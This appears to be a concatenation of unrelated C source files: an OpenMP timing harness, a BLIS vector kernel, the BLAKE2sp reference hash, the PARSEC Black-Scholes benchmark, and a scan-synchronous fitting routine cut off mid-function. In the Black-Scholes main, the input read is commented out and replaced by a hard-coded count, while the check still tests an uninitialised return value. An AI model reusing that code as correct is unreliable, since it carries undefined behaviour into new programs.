{
int k;
double start;
// Calculate the required number of innerreps
innerreps = getinnerreps(test);
intitest(name);
XRayLabelFrame(name);
for (k=0; k<=outerreps; k++) {
start = getclock();
test();
times[k] = (getclock() - start) * 1.0e6 / (double) innerreps;
}
finalisetest(name);
}
// For the Cray compiler on HECToR we need to turn off optimisation
// for the delay and array_delay functions. Other compilers should
// not be affected.
#pragma _CRI noopt
void delay(int delaylength) {
int i;
float a = 0.;
for (i = 0; i < delaylength; i++)
a += i;
if (a < 0)
printf("%f \n", a);
}
void array_delay(int delaylength, double a[1]) {
int i;
a[0] = 1.0;
for (i = 0; i < delaylength; i++)
a[0] += i;
if (a[0] < 0)
printf("%f \n", a[0]);
}
// Re-enable optimisation for remainder of source.
#pragma _CRI opt
double getclock() {
// Returns a value in seconds of the time elapsed from some arbitrary,
// but consistent, point; omp_get_wtime() is declared in omp.h above.
return omp_get_wtime();
}
int returnfalse() {
return 0;
}
|
bli_axpyv_bgq_int.c | /*
BLIS
An object-based framework for developing high-performance BLAS-like
libraries.
Copyright (C) 2014, The University of Texas at Austin
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
- Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
- Neither the name(s) of the copyright holder(s) nor the names of its
contributors may be used to endorse or promote products derived
from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#include "blis.h"
void bli_daxpyv_bgq_int
(
conj_t conjx,
dim_t n,
double* restrict alpha,
double* restrict x, inc_t incx,
double* restrict y, inc_t incy,
cntx_t* restrict cntx
)
{
if ( bli_zero_dim1( n ) ) return;
// If there is anything that would interfere with our use of aligned
// vector loads/stores, call the reference implementation.
bool use_ref = FALSE;
if ( incx != 1 || incy != 1 || bli_is_unaligned_to( ( siz_t )x, 32 ) || bli_is_unaligned_to( ( siz_t )y, 32 ) ) {
use_ref = TRUE;
}
// Call the reference implementation if needed.
if ( use_ref == TRUE ) {
BLIS_DAXPYV_KERNEL_REF( conjx, n, alpha, x, incx, y, incy, cntx );
return;
}
dim_t n_run = n / 4;
dim_t n_left = n % 4;
vector4double alphav = vec_lds( 0 * sizeof(double), (double*)alpha );
// The vector temporaries are declared inside the loop body so that each
// OpenMP thread gets private copies; hoisting them above the parallel
// region would make them shared and race between threads.
#pragma omp parallel for
for ( dim_t i = 0; i < n_run; i++ )
{
vector4double xv = vec_lda( 0 * sizeof(double), &x[i*4] );
vector4double yv = vec_lda( 0 * sizeof(double), &y[i*4] );
vector4double zv = vec_madd( alphav, xv, yv );
vec_sta( zv, 0 * sizeof(double), &y[i*4] );
}
for ( dim_t i = 0; i < n_left; i++ )
{
y[4*n_run + i] += *alpha * x[4*n_run + i];
}
}
|
blake2sp-ref.c | /*
BLAKE2 reference source code package - reference C implementations
Copyright 2012, Samuel Neves <sneves@dei.uc.pt>. You may use this under the
terms of the CC0, the OpenSSL Licence, or the Apache Public License 2.0, at
your option. The terms of these licenses can be found at:
- CC0 1.0 Universal : http://creativecommons.org/publicdomain/zero/1.0
- OpenSSL license : https://www.openssl.org/source/license.html
- Apache 2.0 : http://www.apache.org/licenses/LICENSE-2.0
More information about the BLAKE2 hash function can be found at
https://blake2.net.
*/
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#if defined(_OPENMP)
#include <omp.h>
#endif
#include "blake2.h"
#include "blake2-impl.h"
#define PARALLELISM_DEGREE 8
static int blake2sp_init_leaf( blake2s_state *S, size_t outlen, size_t keylen, uint64_t offset )
{
blake2s_param P[1];
P->digest_length = (uint8_t)outlen;
P->key_length = (uint8_t)keylen;
P->fanout = PARALLELISM_DEGREE;
P->depth = 2;
store32( &P->leaf_length, 0 );
store32( &P->node_offset, offset );
store16( &P->xof_length, 0 );
P->node_depth = 0;
P->inner_length = BLAKE2S_OUTBYTES;
memset( P->salt, 0, sizeof( P->salt ) );
memset( P->personal, 0, sizeof( P->personal ) );
return blake2s_init_param( S, P );
}
static int blake2sp_init_root( blake2s_state *S, size_t outlen, size_t keylen )
{
blake2s_param P[1];
P->digest_length = (uint8_t)outlen;
P->key_length = (uint8_t)keylen;
P->fanout = PARALLELISM_DEGREE;
P->depth = 2;
store32( &P->leaf_length, 0 );
store32( &P->node_offset, 0 );
store16( &P->xof_length, 0 );
P->node_depth = 1;
P->inner_length = BLAKE2S_OUTBYTES;
memset( P->salt, 0, sizeof( P->salt ) );
memset( P->personal, 0, sizeof( P->personal ) );
return blake2s_init_param( S, P );
}
int blake2sp_init( blake2sp_state *S, size_t outlen )
{
size_t i;
if( !outlen || outlen > BLAKE2S_OUTBYTES ) return -1;
memset( S->buf, 0, sizeof( S->buf ) );
S->buflen = 0;
S->outlen = outlen;
if( blake2sp_init_root( S->R, outlen, 0 ) < 0 )
return -1;
for( i = 0; i < PARALLELISM_DEGREE; ++i )
if( blake2sp_init_leaf( S->S[i], outlen, 0, i ) < 0 ) return -1;
S->R->last_node = 1;
S->S[PARALLELISM_DEGREE - 1]->last_node = 1;
return 0;
}
int blake2sp_init_key( blake2sp_state *S, size_t outlen, const void *key, size_t keylen )
{
size_t i;
if( !outlen || outlen > BLAKE2S_OUTBYTES ) return -1;
if( !key || !keylen || keylen > BLAKE2S_KEYBYTES ) return -1;
memset( S->buf, 0, sizeof( S->buf ) );
S->buflen = 0;
S->outlen = outlen;
if( blake2sp_init_root( S->R, outlen, keylen ) < 0 )
return -1;
for( i = 0; i < PARALLELISM_DEGREE; ++i )
if( blake2sp_init_leaf( S->S[i], outlen, keylen, i ) < 0 ) return -1;
S->R->last_node = 1;
S->S[PARALLELISM_DEGREE - 1]->last_node = 1;
{
uint8_t block[BLAKE2S_BLOCKBYTES];
memset( block, 0, BLAKE2S_BLOCKBYTES );
memcpy( block, key, keylen );
for( i = 0; i < PARALLELISM_DEGREE; ++i )
blake2s_update( S->S[i], block, BLAKE2S_BLOCKBYTES );
secure_zero_memory( block, BLAKE2S_BLOCKBYTES ); /* Burn the key from stack */
}
return 0;
}
int blake2sp_update( blake2sp_state *S, const void *pin, size_t inlen )
{
const unsigned char * in = (const unsigned char *)pin;
size_t left = S->buflen;
size_t fill = sizeof( S->buf ) - left;
size_t i;
if( left && inlen >= fill )
{
memcpy( S->buf + left, in, fill );
for( i = 0; i < PARALLELISM_DEGREE; ++i )
blake2s_update( S->S[i], S->buf + i * BLAKE2S_BLOCKBYTES, BLAKE2S_BLOCKBYTES );
in += fill;
inlen -= fill;
left = 0;
}
#if defined(_OPENMP)
#pragma omp parallel shared(S), num_threads(PARALLELISM_DEGREE)
#else
for( i = 0; i < PARALLELISM_DEGREE; ++i )
#endif
{
#if defined(_OPENMP)
size_t i = omp_get_thread_num();
#endif
size_t inlen__ = inlen;
const unsigned char *in__ = ( const unsigned char * )in;
in__ += i * BLAKE2S_BLOCKBYTES;
while( inlen__ >= PARALLELISM_DEGREE * BLAKE2S_BLOCKBYTES )
{
blake2s_update( S->S[i], in__, BLAKE2S_BLOCKBYTES );
in__ += PARALLELISM_DEGREE * BLAKE2S_BLOCKBYTES;
inlen__ -= PARALLELISM_DEGREE * BLAKE2S_BLOCKBYTES;
}
}
in += inlen - inlen % ( PARALLELISM_DEGREE * BLAKE2S_BLOCKBYTES );
inlen %= PARALLELISM_DEGREE * BLAKE2S_BLOCKBYTES;
if( inlen > 0 )
memcpy( S->buf + left, in, inlen );
S->buflen = left + inlen;
return 0;
}
int blake2sp_final( blake2sp_state *S, void *out, size_t outlen )
{
uint8_t hash[PARALLELISM_DEGREE][BLAKE2S_OUTBYTES];
size_t i;
if(out == NULL || outlen < S->outlen) {
return -1;
}
for( i = 0; i < PARALLELISM_DEGREE; ++i )
{
if( S->buflen > i * BLAKE2S_BLOCKBYTES )
{
size_t left = S->buflen - i * BLAKE2S_BLOCKBYTES;
if( left > BLAKE2S_BLOCKBYTES ) left = BLAKE2S_BLOCKBYTES;
blake2s_update( S->S[i], S->buf + i * BLAKE2S_BLOCKBYTES, left );
}
blake2s_final( S->S[i], hash[i], BLAKE2S_OUTBYTES );
}
for( i = 0; i < PARALLELISM_DEGREE; ++i )
blake2s_update( S->R, hash[i], BLAKE2S_OUTBYTES );
return blake2s_final( S->R, out, S->outlen );
}
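/* Usage sketch (illustrative, not part of the reference API): one-shot
   hashing of a buffer via the incremental init/update/final interface
   defined above. */
static int blake2sp_hash_example( void *out, size_t outlen,
                                  const void *in, size_t inlen )
{
  blake2sp_state S;
  if( blake2sp_init( &S, outlen ) < 0 ) return -1;
  if( blake2sp_update( &S, in, inlen ) < 0 ) return -1;
  return blake2sp_final( &S, out, outlen );
}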
int blake2sp( void *out, size_t outlen, const void *in, size_t inlen, const void *key, size_t keylen )
{
uint8_t hash[PARALLELISM_DEGREE][BLAKE2S_OUTBYTES];
blake2s_state S[PARALLELISM_DEGREE][1];
blake2s_state FS[1];
size_t i;
/* Verify parameters */
if ( NULL == in && inlen > 0 ) return -1;
if ( NULL == out ) return -1;
if ( NULL == key && keylen > 0) return -1;
if( !outlen || outlen > BLAKE2S_OUTBYTES ) return -1;
if( keylen > BLAKE2S_KEYBYTES ) return -1;
for( i = 0; i < PARALLELISM_DEGREE; ++i )
if( blake2sp_init_leaf( S[i], outlen, keylen, i ) < 0 ) return -1;
S[PARALLELISM_DEGREE - 1]->last_node = 1; /* mark last node */
if( keylen > 0 )
{
uint8_t block[BLAKE2S_BLOCKBYTES];
memset( block, 0, BLAKE2S_BLOCKBYTES );
memcpy( block, key, keylen );
for( i = 0; i < PARALLELISM_DEGREE; ++i )
blake2s_update( S[i], block, BLAKE2S_BLOCKBYTES );
secure_zero_memory( block, BLAKE2S_BLOCKBYTES ); /* Burn the key from stack */
}
#if defined(_OPENMP)
#pragma omp parallel shared(S,hash), num_threads(PARALLELISM_DEGREE)
#else
for( i = 0; i < PARALLELISM_DEGREE; ++i )
#endif
{
#if defined(_OPENMP)
size_t i = omp_get_thread_num();
#endif
size_t inlen__ = inlen;
const unsigned char *in__ = ( const unsigned char * )in;
in__ += i * BLAKE2S_BLOCKBYTES;
while( inlen__ >= PARALLELISM_DEGREE * BLAKE2S_BLOCKBYTES )
{
blake2s_update( S[i], in__, BLAKE2S_BLOCKBYTES );
in__ += PARALLELISM_DEGREE * BLAKE2S_BLOCKBYTES;
inlen__ -= PARALLELISM_DEGREE * BLAKE2S_BLOCKBYTES;
}
if( inlen__ > i * BLAKE2S_BLOCKBYTES )
{
const size_t left = inlen__ - i * BLAKE2S_BLOCKBYTES;
const size_t len = left <= BLAKE2S_BLOCKBYTES ? left : BLAKE2S_BLOCKBYTES;
blake2s_update( S[i], in__, len );
}
blake2s_final( S[i], hash[i], BLAKE2S_OUTBYTES );
}
if( blake2sp_init_root( FS, outlen, keylen ) < 0 )
return -1;
FS->last_node = 1;
for( i = 0; i < PARALLELISM_DEGREE; ++i )
blake2s_update( FS, hash[i], BLAKE2S_OUTBYTES );
return blake2s_final( FS, out, outlen );
}
#if defined(BLAKE2SP_SELFTEST)
#include <string.h>
#include "blake2-kat.h"
int main( void )
{
uint8_t key[BLAKE2S_KEYBYTES];
uint8_t buf[BLAKE2_KAT_LENGTH];
size_t i, step;
for( i = 0; i < BLAKE2S_KEYBYTES; ++i )
key[i] = ( uint8_t )i;
for( i = 0; i < BLAKE2_KAT_LENGTH; ++i )
buf[i] = ( uint8_t )i;
/* Test simple API */
for( i = 0; i < BLAKE2_KAT_LENGTH; ++i )
{
uint8_t hash[BLAKE2S_OUTBYTES];
blake2sp( hash, BLAKE2S_OUTBYTES, buf, i, key, BLAKE2S_KEYBYTES );
if( 0 != memcmp( hash, blake2sp_keyed_kat[i], BLAKE2S_OUTBYTES ) )
{
goto fail;
}
}
/* Test streaming API */
for(step = 1; step < BLAKE2S_BLOCKBYTES; ++step) {
for (i = 0; i < BLAKE2_KAT_LENGTH; ++i) {
uint8_t hash[BLAKE2S_OUTBYTES];
blake2sp_state S;
uint8_t * p = buf;
size_t mlen = i;
int err = 0;
if( (err = blake2sp_init_key(&S, BLAKE2S_OUTBYTES, key, BLAKE2S_KEYBYTES)) < 0 ) {
goto fail;
}
while (mlen >= step) {
if ( (err = blake2sp_update(&S, p, step)) < 0 ) {
goto fail;
}
mlen -= step;
p += step;
}
if ( (err = blake2sp_update(&S, p, mlen)) < 0) {
goto fail;
}
if ( (err = blake2sp_final(&S, hash, BLAKE2S_OUTBYTES)) < 0) {
goto fail;
}
if (0 != memcmp(hash, blake2sp_keyed_kat[i], BLAKE2S_OUTBYTES)) {
goto fail;
}
}
}
puts( "ok" );
return 0;
fail:
puts("error");
return -1;
}
#endif
|
blackscholes.c | // Copyright (c) 2007 Intel Corp.
// Black-Scholes
// Analytical method for calculating European Options
//
//
// Reference Source: Options, Futures, and Other Derivatives, 3rd Edition,
// Prentice
// Hall, John C. Hull,
#include <stdio.h>
#include <stdlib.h>
#include <math.h>
#include <string.h>
#ifdef ENABLE_PARSEC_HOOKS
#include <hooks.h>
#endif
#define ENABLE_THREADS 1
// Multi-threaded pthreads header
#ifdef ENABLE_THREADS
// Add the following line so that icc 9.0 is compatible with pthread lib.
#define __thread __threadp
#ifdef _XOPEN_SOURCE
#undef _XOPEN_SOURCE
#define _XOPEN_SOURCE 700
#endif
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#ifndef __USE_XOPEN2K
#define __USE_XOPEN2K
#endif
#ifndef __USE_UNIX98
#define __USE_UNIX98
#endif
#include <pthread.h>
#include <time.h>
#define MAX_THREADS 128
pthread_t _M4_threadsTable[MAX_THREADS];
int _M4_threadsTableAllocated[MAX_THREADS];
pthread_mutexattr_t _M4_normalMutexAttr;
int _M4_numThreads = MAX_THREADS;
#undef __thread
#endif
// Multi-threaded OpenMP header
#ifdef ENABLE_OPENMP
#include <omp.h>
#endif
#ifdef ENABLE_TBB
#include "tbb/blocked_range.h"
#include "tbb/parallel_for.h"
#include "tbb/task_scheduler_init.h"
#include "tbb/tick_count.h"
using namespace std;
using namespace tbb;
#endif // ENABLE_TBB
// Multi-threaded header for Windows
#ifdef WIN32
#pragma warning(disable : 4305)
#pragma warning(disable : 4244)
#include <windows.h>
#define WIN32_LEAN_AND_MEAN
#include <shellapi.h>
#endif
// Precision to use for calculations
#define fptype float
#define NUM_RUNS 3
typedef struct OptionData_ {
fptype s; // spot price
fptype strike; // strike price
fptype r; // risk-free interest rate
fptype divq; // dividend rate
fptype v; // volatility
fptype t; // time to maturity or option expiration in years
// (1yr = 1.0, 6mos = 0.5, 3mos = 0.25, ..., etc)
char OptionType; // Option type. "P"=PUT, "C"=CALL
fptype divs; // dividend vals (not used in this test)
fptype DGrefval; // DerivaGem Reference Value
} OptionData;
OptionData *data;
fptype *prices;
int numOptions;
int *otype;
fptype *sptprice;
fptype *strike;
fptype *rate;
fptype *volatility;
fptype *otime;
int numError = 0;
int nThreads;
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
// Cumulative Normal Distribution Function
// See Hull, Section 11.8, P.243-244
#define inv_sqrt_2xPI 0.39894228040143270286
fptype CNDF(fptype InputX) {
int sign;
fptype OutputX;
fptype xInput;
fptype xNPrimeofX;
fptype expValues;
fptype xK2;
fptype xK2_2, xK2_3;
fptype xK2_4, xK2_5;
fptype xLocal, xLocal_1;
fptype xLocal_2, xLocal_3;
// Check for negative value of InputX
if (InputX < 0.0) {
InputX = -InputX;
sign = 1;
} else
sign = 0;
xInput = InputX;
// Compute NPrimeX term common to both four & six decimal accuracy calcs
expValues = exp(-0.5f * InputX * InputX);
xNPrimeofX = expValues;
xNPrimeofX = xNPrimeofX * inv_sqrt_2xPI;
xK2 = 0.2316419 * xInput;
xK2 = 1.0 + xK2;
xK2 = 1.0 / xK2;
xK2_2 = xK2 * xK2;
xK2_3 = xK2_2 * xK2;
xK2_4 = xK2_3 * xK2;
xK2_5 = xK2_4 * xK2;
xLocal_1 = xK2 * 0.319381530;
xLocal_2 = xK2_2 * (-0.356563782);
xLocal_3 = xK2_3 * 1.781477937;
xLocal_2 = xLocal_2 + xLocal_3;
xLocal_3 = xK2_4 * (-1.821255978);
xLocal_2 = xLocal_2 + xLocal_3;
xLocal_3 = xK2_5 * 1.330274429;
xLocal_2 = xLocal_2 + xLocal_3;
xLocal_1 = xLocal_2 + xLocal_1;
xLocal = xLocal_1 * xNPrimeofX;
xLocal = 1.0 - xLocal;
OutputX = xLocal;
if (sign) {
OutputX = 1.0 - OutputX;
}
return OutputX;
}
//////////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////////
fptype BlkSchlsEqEuroNoDiv(fptype sptprice, fptype strike, fptype rate,
fptype volatility, fptype time, int otype,
float timet) {
fptype OptionPrice;
// local private working variables for the calculation
fptype xStockPrice;
fptype xStrikePrice;
fptype xRiskFreeRate;
fptype xVolatility;
fptype xTime;
fptype xSqrtTime;
fptype logValues;
fptype xLogTerm;
fptype xD1;
fptype xD2;
fptype xPowerTerm;
fptype xDen;
fptype d1;
fptype d2;
fptype FutureValueX;
fptype NofXd1;
fptype NofXd2;
fptype NegNofXd1;
fptype NegNofXd2;
xStockPrice = sptprice;
xStrikePrice = strike;
xRiskFreeRate = rate;
xVolatility = volatility;
xTime = time;
xSqrtTime = sqrt(xTime);
logValues = log(sptprice / strike);
xLogTerm = logValues;
xPowerTerm = xVolatility * xVolatility;
xPowerTerm = xPowerTerm * 0.5;
xD1 = xRiskFreeRate + xPowerTerm;
xD1 = xD1 * xTime;
xD1 = xD1 + xLogTerm;
xDen = xVolatility * xSqrtTime;
xD1 = xD1 / xDen;
xD2 = xD1 - xDen;
d1 = xD1;
d2 = xD2;
NofXd1 = CNDF(d1);
NofXd2 = CNDF(d2);
FutureValueX = strike * (exp(-(rate) * (time)));
if (otype == 0) {
OptionPrice = (sptprice * NofXd1) - (FutureValueX * NofXd2);
} else {
NegNofXd1 = (1.0 - NofXd1);
NegNofXd2 = (1.0 - NofXd2);
OptionPrice = (FutureValueX * NegNofXd2) - (sptprice * NegNofXd1);
}
return OptionPrice;
}
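// Spot-check sketch (illustrative values, not from the PARSEC inputs):
// a one-year at-the-money European call with S=K=100, r=5%, sigma=20%
// should price near the textbook value of roughly 10.45.
static void BlkSchlsExample(void) {
  fptype call = BlkSchlsEqEuroNoDiv(100.0, 100.0, 0.05, 0.20, 1.0, 0, 0);
  printf("example call price: %f\n", call);
}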
#ifdef ENABLE_TBB
struct mainWork {
mainWork() {}
mainWork(mainWork &w, tbb::split) {}
void operator()(const tbb::blocked_range<int> &range) const {
fptype price;
int begin = range.begin();
int end = range.end();
for (int i = begin; i != end; i++) {
/* Calling main function to calculate option value based on
* Black & Scholes's equation.
*/
price = BlkSchlsEqEuroNoDiv(sptprice[i], strike[i], rate[i],
volatility[i], otime[i], otype[i], 0);
prices[i] = price;
#ifdef ERR_CHK
fptype priceDelta = data[i].DGrefval - price;
if (fabs(priceDelta) >= 1e-5) {
fprintf(stderr, "Error on %d. Computed=%.5f, Ref=%.5f, Delta=%.5f\n", i,
price, data[i].DGrefval, priceDelta);
numError++;
}
#endif
}
}
};
#endif // ENABLE_TBB
//////////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////////
#ifdef ENABLE_TBB
int bs_thread(void *tid_ptr) {
int j;
tbb::affinity_partitioner a;
mainWork doall;
for (j = 0; j < NUM_RUNS; j++) {
tbb::parallel_for(tbb::blocked_range<int>(0, numOptions), doall, a);
}
return 1;
}
#else // !ENABLE_TBB
#ifdef WIN32
DWORD WINAPI bs_thread(LPVOID tid_ptr) {
#else
int bs_thread(void *tid_ptr) {
#endif
int i, j;
fptype price;
fptype priceDelta;
int tid = *(int *)tid_ptr;
int start = tid * (numOptions / nThreads);
int end = start + (numOptions / nThreads);
for (j = 0; j < NUM_RUNS; j++) {
#ifdef ENABLE_OPENMP
#pragma omp parallel for private(i, price, priceDelta)
for (i = 0; i < numOptions; i++) {
#else // ENABLE_OPENMP
for (i = start; i < end; i++) {
#endif // ENABLE_OPENMP
/* Calling main function to calculate option value based on
* Black & Scholes's equation.
*/
price = BlkSchlsEqEuroNoDiv(sptprice[i], strike[i], rate[i],
volatility[i], otime[i], otype[i], 0);
prices[i] = price;
#ifdef ERR_CHK
priceDelta = data[i].DGrefval - price;
if (fabs(priceDelta) >= 1e-4) {
printf("Error on %d. Computed=%.5f, Ref=%.5f, Delta=%.5f\n", i, price,
data[i].DGrefval, priceDelta);
numError++;
}
#endif
}
}
return 1;
}
#endif // ENABLE_TBB
int main(int argc, char **argv) {
FILE *file;
int i;
int loopnum;
fptype *buffer;
int *buffer2;
int rv;
#ifdef PARSEC_VERSION
#define __PARSEC_STRING(x) #x
#define __PARSEC_XSTRING(x) __PARSEC_STRING(x)
printf(
"PARSEC Benchmark Suite Version "__PARSEC_XSTRING(PARSEC_VERSION) "\n");
fflush(NULL);
#else
printf("PARSEC Benchmark Suite\n");
fflush(NULL);
#endif // PARSEC_VERSION
#ifdef ENABLE_PARSEC_HOOKS
__parsec_bench_begin(__parsec_blackscholes);
#endif
if (argc != 4) {
printf("Usage:\n\t%s <nthreads> <inputFile> <outputFile>\n", argv[0]);
return 1;
}
nThreads = atoi(argv[1]);
char *inputFile = argv[2];
char *outputFile = argv[3];
// Read input data from file
file = fopen(inputFile, "r");
if (file == NULL) {
printf("ERROR: Unable to open file %s.\n", inputFile);
return 1;
}
// rv = fscanf(file, "%i", &numOptions);
numOptions = 4;
if (rv != 1) {
printf("ERROR: Unable to read from file %s.\n", inputFile);
fclose(file);
return 1;
}
if (nThreads > numOptions) {
printf("WARNING: Not enough work, reducing number of threads to match "
"number of options.\n");
nThreads = numOptions;
}
#if !defined(ENABLE_THREADS) && !defined(ENABLE_OPENMP) && !defined(ENABLE_TBB)
if (nThreads != 1) {
printf("Error: <nthreads> must be 1 (serial version)\n");
return 1;
}
#endif
// alloc spaces for the option data
data = (OptionData *)malloc(numOptions * sizeof(OptionData));
prices = (fptype *)malloc(numOptions * sizeof(fptype));
for (loopnum = 0; loopnum < numOptions; ++loopnum) {
rv = fscanf(file, "%f %f %f %f %f %f %c %f %f", &data[loopnum].s,
&data[loopnum].strike, &data[loopnum].r, &data[loopnum].divq,
&data[loopnum].v, &data[loopnum].t, &data[loopnum].OptionType,
&data[loopnum].divs, &data[loopnum].DGrefval);
if (rv != 9) {
printf("ERROR: Unable to read from file %s.\n", inputFile);
fclose(file);
return 1;
}
}
rv = fclose(file);
if (rv != 0) {
printf("ERROR: Unable to close file %s.\n", inputFile);
return 1;
}
#ifdef ENABLE_THREADS
pthread_mutexattr_init(&_M4_normalMutexAttr);
// pthread_mutexattr_settype( &_M4_normalMutexAttr, PTHREAD_MUTEX_NORMAL);
_M4_numThreads = nThreads;
{
int _M4_i;
for (_M4_i = 0; _M4_i < MAX_THREADS; _M4_i++) {
_M4_threadsTableAllocated[_M4_i] = 0;
}
};
#endif
printf("Num of Options: %d\n", numOptions);
printf("Num of Runs: %d\n", NUM_RUNS);
#define PAD 256
#define LINESIZE 64
buffer = (fptype *)malloc(5 * numOptions * sizeof(fptype) + PAD);
sptprice = (fptype *)(((unsigned long long)buffer + PAD) & ~(LINESIZE - 1));
strike = sptprice + numOptions;
rate = strike + numOptions;
volatility = rate + numOptions;
otime = volatility + numOptions;
buffer2 = (int *)malloc(numOptions * sizeof(fptype) + PAD);
otype = (int *)(((unsigned long long)buffer2 + PAD) & ~(LINESIZE - 1));
for (i = 0; i < numOptions; i++) {
otype[i] = (data[i].OptionType == 'P') ? 1 : 0;
sptprice[i] = data[i].s;
strike[i] = data[i].strike;
rate[i] = data[i].r;
volatility[i] = data[i].v;
otime[i] = data[i].t;
}
printf("Size of data: %d\n", numOptions * (sizeof(OptionData) + sizeof(int)));
#ifdef ENABLE_PARSEC_HOOKS
__parsec_roi_begin();
#endif
#ifdef ENABLE_THREADS
#ifdef WIN32
printf("WIN32\n");
HANDLE *threads;
int *nums;
threads = (HANDLE *)malloc(nThreads * sizeof(HANDLE));
nums = (int *)malloc(nThreads * sizeof(int));
for (i = 0; i < nThreads; i++) {
nums[i] = i;
threads[i] = CreateThread(0, 0, bs_thread, &nums[i], 0, 0);
}
WaitForMultipleObjects(nThreads, threads, TRUE, INFINITE);
free(threads);
free(nums);
#else
int *tids;
tids = (int *)malloc(nThreads * sizeof(int));
for (i = 0; i < nThreads; i++) {
tids[i] = i;
{
int _M4_i;
for (_M4_i = 0; _M4_i < MAX_THREADS; _M4_i++) {
if (_M4_threadsTableAllocated[_M4_i] == 0)
break;
}
pthread_create(&_M4_threadsTable[_M4_i], NULL,
(void *(*)(void *))bs_thread, (void *)&tids[i]);
_M4_threadsTableAllocated[_M4_i] = 1;
};
}
{
int _M4_i;
void *_M4_ret;
for (_M4_i = 0; _M4_i < MAX_THREADS; _M4_i++) {
if (_M4_threadsTableAllocated[_M4_i] == 0)
break;
pthread_join(_M4_threadsTable[_M4_i], &_M4_ret);
}
};
free(tids);
#endif // WIN32
#else // ENABLE_THREADS
#ifdef ENABLE_OPENMP
{
int tid = 0;
omp_set_num_threads(nThreads);
bs_thread(&tid);
}
#else // ENABLE_OPENMP
#ifdef ENABLE_TBB
tbb::task_scheduler_init init(nThreads);
int tid = 0;
bs_thread(&tid);
#else // ENABLE_TBB
// serial version
int tid = 0;
bs_thread(&tid);
#endif // ENABLE_TBB
#endif // ENABLE_OPENMP
#endif // ENABLE_THREADS
#ifdef ENABLE_PARSEC_HOOKS
__parsec_roi_end();
#endif
// Write prices to output file
file = fopen(outputFile, "w");
if (file == NULL) {
printf("ERROR: Unable to open file %s.\n", outputFile);
return 1;
}
rv = fprintf(file, "%i\n", numOptions);
if (rv < 0) {
printf("ERROR: Unable to write to file %s.\n", outputFile);
fclose(file);
return 1;
}
for (i = 0; i < numOptions; i++) {
rv = fprintf(file, "%.18f\n", prices[i]);
if (rv < 0) {
printf("ERROR: Unable to write to file %s.\n", outputFile);
fclose(file);
return 1;
}
}
rv = fclose(file);
if (rv != 0) {
printf("ERROR: Unable to close file %s.\n", outputFile);
return 1;
}
#ifdef ERR_CHK
printf("Num Errors: %d\n", numError);
#endif
free(data);
free(prices);
#ifdef ENABLE_PARSEC_HOOKS
__parsec_bench_end();
#endif
return 0;
}
|
sync.c | #include "pyactpol.h"
#include <gsl/gsl_linalg.h>
/* sync.c
*
* scan-synchronous mode fitting and removal.
*/
static int fit_poly(float *x, double *y, int n, int order, int samp,
double *fit);
static int fit_sine(double *t, double *y, int n, double f,
double *fit, double *coeff);
/* Find the amplitude and phase of the synchronous signal in a set of
* detectors together with the phase of the azimuth scan.
*
* az should already have the mean removed. ctime should start at 0
* to minimize rounding errors. nwin should be the number of samples
* to use for the amplitude fit; i.e. a whole number of azimuth scans.
*/
static int mbSyncFit(double* az, double* ctime,
float* data, int ndata,
int *dets, int ndets,
float *sync_amp, float* sync_phase,
float *sync_rms,
float *phaseAz,
float f,
int order, int samp, int nT)
{
int n, nwin;
double sampRate, thetaAz;
// Calculate size of data window to do analysis
sampRate = (double)ndata / (ctime[ndata-1] - ctime[0]);
nwin = floor( (double)nT / f * sampRate );
if (nwin > ndata) {
nwin = ndata;
}
double *fit_az = malloc(nwin * sizeof(double));
double *coeff_az = malloc(2 * sizeof(double));
// Obtain phase of azimuth scan
if (fit_sine(ctime, az, nwin, f, fit_az, coeff_az) != 0)
return 1;
if (coeff_az[0] > 0) thetaAz = atan(coeff_az[1]/coeff_az[0]);
else thetaAz = atan(coeff_az[1]/coeff_az[0]) + M_PI;
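// For coeff_az[0] != 0 this equals atan2(coeff_az[1], coeff_az[0]) up to a
// multiple of 2*pi; the branch maps the phase into (-pi/2, 3*pi/2) rather
// than atan2's (-pi, pi].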
*phaseAz = thetaAz;
free(fit_az);
free(coeff_az);
float *tcopy = malloc(nwin * sizeof(float));
for (int j=0; j<nwin; j++)
tcopy[j] = ctime[j] - ctime[0];
// Process all selected detectors
#pragma omp parallel private(n)
{
double *y = malloc(nwin * sizeof(double));
double *fit_1f = malloc(nwin * sizeof(double));
double *fit_syn = malloc(nwin * sizeof(double));
double *coeff_syn = malloc(2 * sizeof(double));
#pragma omp for
for (n = 0; n < ndets; n++) {
int i;
double A, theta, rms;
float *det_data = data + ndata * dets[n];
// Obtain copy of data
for (i = 0; i < nwin; i++)
y[i] = det_data[i];
// Fit and subtract polynomial
